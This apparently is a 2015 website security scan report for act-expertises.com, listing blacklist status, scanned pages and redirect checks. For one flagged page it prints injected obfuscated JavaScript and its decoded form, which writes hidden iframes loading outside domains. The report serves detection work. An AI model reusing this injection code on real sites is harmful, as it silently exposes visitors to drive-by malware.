Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=act-expertises.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.act-expertises.com/ | HTTP/1.1 200 OK Connection: close Date: Tue, 13 Jan 2015 00:14:25 GMT Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding Content-Length: 6123 Content-Type: text/html Set-Cookie: 60gpBAK=R1224195776; path=/; expires=Tue, 13-Jan-2015 01:24:31 GMT Set-Cookie: 60gp=R446941744; path=/; expires=Tue, 13-Jan-2015 01:24:31 GMT | clean |
http://www.act-expertises.com/memo/index.html | 200 OK Content-Length: 6333 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3 for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); Decoded script: var Str="' height='1' style='visibility: hidden;'></iframe> <iframe src='http://socks4-5.biz/index.php' width='1" document.write(Str.substring(52,105),Str.substring(0,52)) Antivirus reports:
Hidden iFrame found. size: 0x0 style: hidden src: http://trafcount.cn/counter/index.php?out=1196394696 <iframe src="http://trafcount.cn/counter/index.php?out=1196394696" width="0" height="0" style="display:none"> | ||
http://www.act-expertises.com/memo/quota.cgi | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.act-expertises.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.act-expertises.com/quota.cgi | 404 Not Found Content-Length: 207 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: act-expertises.com
Result:
GET / HTTP/1.1
Host: act-expertises.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: act-expertises.com
Referer: http://www.google.com/search?q=act-expertises.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: act-expertises.com
Referer: http://www.google.com/search?q=act-expertises.com
Result:
The result is similar to the first query. There are no suspicious redirects found.